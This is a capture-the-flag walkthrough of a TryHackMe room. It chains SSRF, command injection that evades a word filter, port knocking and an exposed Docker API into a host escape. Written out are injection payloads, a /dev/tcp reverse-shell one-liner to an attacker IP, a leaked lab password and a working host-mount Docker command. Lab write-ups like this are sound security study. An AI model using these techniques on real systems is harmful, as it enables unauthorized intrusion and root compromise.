Room link: https://tryhackme.com/room/thegreatescape
Enum
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http22/tcp open ssh?
| fingerprint-strings:
| GenericLines:
|_ m6"<
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open http nginx 1.19.6
|_http-favicon: Unknown favicon MD5: 67EDB7D39E1376FDD8A24B0C640D781E
| http-methods:
|_ Supported Methods: HEAD
| http-robots.txt: 3 disallowed entries
|_/api/ /exif-util /*.bak.txt$
|_http-server-header: nginx/1.19.6
|_http-title: docker-escape-nuxt
|_http-trane-info: Problem with XML parsing of /evox/about
Port 80
Main page
/robots.txt
SSRF
Using the exif-util hint we find another endpoint that is vulnerable to SSRF techniques.
Sending this to burp I tested a few more ports to see what was available internally.
Intruder setup
Results
I found port 8080 to be open internally.
Looking at robots.txt again I noticed another hint.
# Disallow: /exif-util
Disallow: /*.bak.txt$
/exif-util.bak.txt
This file shows a new endpoint to play with. This must be the call to the internal web app. Let’s call it to see the response.
http://api-dev-backup:8080/exif
Calling the server url, then calling the internal port 8080 with a new URL parameter gave a different response to banned words.
http://10.10.31.233/api/exif?url=http://api-dev-backup:8080/exif?url=/etc/passwd
I quickly worked out we can use command injection here to get some results.
http://10.10.183.57/api/exif?url=http://api-dev-backup:8080/exif?url=;ls -la
I was still blocked on the banned words. So tried a few tricks from here: https://book.hacktricks.xyz/linux-unix/useful-linux-commands/bypass-bash-restrictions
Then I was able to bypass the bad word filter with a simple ‘’
Using this technique I started to enum the system before I attempted to get a reverse shell.
Bypass chars
$IFS # Spaces
'' # Break a word upEg:
exif?url=;cat$IFS/etc/pas''swd
exif?url=;cat${IFS}/etc/pas''swd
Further testing and results.
Sent: http://10.10.183.57/api/exif?url=http://api-dev-backup:8080/exif?url=;idResponse: uid=0(root) gid=0(root) groups=0(root)
Sent: http://10.10.183.57/api/exif?url=http://api-dev-backup:8080/exif?url=;hostnameResponse: api-dev-backup
User
Doing some more enum on the main url showed some interesting results.
dirb http://10.10.16.111/ /usr/share/seclists/Discovery/Web-Content/common.txt
Curling the request and we get the flag for user.
Root (Docker Container)
I started to craft a payload that would work to bypass the word filter.
a="ba";b="sh";echo "$a$b -c '$a$b -i >& /dev/tcp/10.8.153.120/9999 0>&1'"
This also failed. Looking again I worked out its best to close the first command being sent.
So Curl is the first command to run.
So null that command with ‘’;
Now enter any other command.
'';/bin/ba''sh -c "id"
http://10.10.3.112/api/exif?url=http://api-dev-backup:8080/exif?url='';id Retrieved Content
----------------------------------------
uid=0(root) gid=0(root) groups=0(root)
After many attempts to get a reverse shell, I quickly realised it was not going to happen. I then started manual enumeration.
Knowing we were already root. I started there.
dev-note.txt
Hey guys,Apparently leaving the flag and docker access on the server is a bad idea, or so the security guys tell me. I've deleted the stuff.Anyways, the password is fluffybunnies123Cheers,Hydra
Also we note a git repo here too. Let's start to enumerate that too.
http://10.10.3.112/api/exif?url=http://api-dev-backup:8080/exif?url='';cd /root; git log
Let's see the changes on the commit ids.
http://10.10.3.112/api/exif?url=http://api-dev-backup:8080/exif?url='';cd /root; git show 4530ff7f56b215fa9fe76c4d7cc1319960c4e539
Awesome! we get the flag and a hint to open a port for docker tcp.
Port Knocking (root flag)
Ports to knock.
knock 10.10.3.112 42 1337 10420 6969 63000
Before
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
After
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
2375/tcp open docker
Now we have a new port open, time to connect and see what's on it.
Using the info here: https://book.hacktricks.xyz/pentesting/2375-pentesting-docker, It was easy to enum the target.
curl -s http://10.10.3.112:2375/version | jq
#or
docker -H 10.10.3.112:2375 versiondocker -H 10.10.3.112:2375 imagesREPOSITORY TAG IMAGE ID CREATED SIZE
exif-api-dev latest 4084cb55e1c7 7 months ago 214MB
exif-api latest 923c5821b907 7 months ago 163MB
frontend latest 577f9da1362e 7 months ago 138MB
endlessh latest 7bde5182dc5e 7 months ago 5.67MB
nginx latest ae2feff98a0c 8 months ago 133MB
debian 10-slim 4a9cd57610d6 8 months ago 69.2MB
registry.access.redhat.com/ubi8/ubi-minimal 8.3 7331d26c1fdf 8 months ago 103MB
alpine 3.9 78a2ce922f86 15 months ago 5.55MB
After trying a few containers, I found one that let me login and had the filesystem for the host on.
docker -H 10.10.3.112:2375 run --rm -it -v /:/host/ nginx chroot /host/ bash
Now we can get the real root flag and complete the box.